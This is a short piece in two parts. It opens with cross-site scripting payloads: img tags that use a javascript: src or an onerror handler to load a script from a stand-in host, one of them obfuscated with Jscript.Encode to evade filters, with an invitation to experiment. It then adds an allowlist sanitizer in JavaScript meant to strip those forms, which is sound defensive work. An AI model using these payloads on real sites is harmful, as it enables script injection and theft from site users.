<img src="javascript:try{var s=document.createElement('script');s.src='http://XSS/XSS.js';document.body.appendChild(s);}catch(e){}"></img>
What if characters are being filtered? Encode the script with Jscript.Encode and it becomes unbeatable~
Before encoding:
<img src='#' XSS="try{var s=document.createElement('script');s.src='http://XSS/XSS.js';document.body.appendChild(s);}catch(e){}" onerror="execScript(decodeURI(this.XSS),'Jscript.Encode');" >
After encoding:
<img src='#' XSS="#@~^bQAAAA==OMX`7lMP/{NK^Es UYcm.nmY As s xDcv/1DbwOBbIkRdD1xB4YO2=zzpjUzp?U N/vpNKmEs OR(W[Xcl22xN;4k^N`kbI81lDm4`nbP8XCcAAA==^#~@ " onerror="execScript(decodeURI(this.XSS),'Jscript.Encode');" >
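Heh heh~ Exciting, right?~ How to use it beyond this is for you to experiment with yourself. For it to work properly, the Encode-encoded code also needs to be passed through encodeURI once.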
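
The payloads above get past a filter that searches for characters or keywords because the script text is only decoded at run time inside the `onerror` handler. As an added example (not from the original page), an allowlist that rebuilds the `<img>` tag from permitted attributes and `src` prefixes drops all three forms regardless of encoding; `sanitizeImg`, the attribute list and the sample strings are constructed for illustration, and the regex handles only a single tag with quoted attribute values.

```javascript
// Added example: allowlist-based rebuild of an <img> tag (not a full HTML sanitizer).
const ALLOWED_ATTRS = new Set(['src', 'alt', 'title', 'width', 'height']);
// Only these src prefixes pass: http(s) URL, root- or dot-relative path, fragment.
const SAFE_SRC = /^(?:https?:\/\/|\/|\.\/|#)/i;
// name="value" or name='value'; unquoted values never match and are never re-emitted.
const ATTR_RE = /([^\s"'<>\/=]+)\s*=\s*(?:"([^"]*)"|'([^']*)')/g;

function escapeAttr(value) {
  return value.replace(/&/g, '&amp;').replace(/"/g, '&quot;')
              .replace(/</g, '&lt;').replace(/>/g, '&gt;');
}

function sanitizeImg(tag) {
  const kept = [];
  const dropped = [];
  for (const m of tag.matchAll(ATTR_RE)) {
    const name = m[1].toLowerCase();
    const value = m[2] !== undefined ? m[2] : m[3];
    // Unknown attributes (custom carriers, every on* handler) are dropped by name,
    // so it does not matter how their value is encoded.
    if (!ALLOWED_ATTRS.has(name)) { dropped.push(name); continue; }
    // src is judged by an allowed prefix, not by searching for "javascript:".
    if (name === 'src' && !SAFE_SRC.test(value)) { dropped.push(name); continue; }
    kept.push(`${name}="${escapeAttr(value)}"`);
  }
  const html = kept.length ? `<img ${kept.join(' ')}>` : '<img>';
  return { html, dropped };
}

// Constructed samples shaped like the page's three cases; payload bodies are placeholders.
const SAMPLES = [
  `<img src="javascript:PLACEHOLDER"></img>`,
  `<img src='#' XSS="PLAIN-SCRIPT-PLACEHOLDER" onerror="execScript(decodeURI(this.XSS),'Jscript.Encode');" alt="logo">`,
  `<img src='#' XSS="#@~^ENCODED-PLACEHOLDER^#~@" onerror="execScript(decodeURI(this.XSS),'Jscript.Encode');">`,
  `<img src="https://example.com/a.png" width="10">`,
];

for (const s of SAMPLES) {
  const { html, dropped } = sanitizeImg(s);
  console.log(html, '| dropped:', dropped.join(',') || '(none)');
}
```

In production, a maintained HTML sanitizer working on a parsed DOM should replace the regex; the allowlist principle stays the same.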